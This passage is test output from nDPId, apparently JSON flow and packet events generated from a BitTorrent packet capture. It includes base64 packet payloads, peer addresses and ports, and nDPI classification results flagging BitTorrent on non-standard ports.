(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="} -01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAA
AFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="} -01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAF
BAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="} -01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwA
AAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="} -01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAA
AAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="} -01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\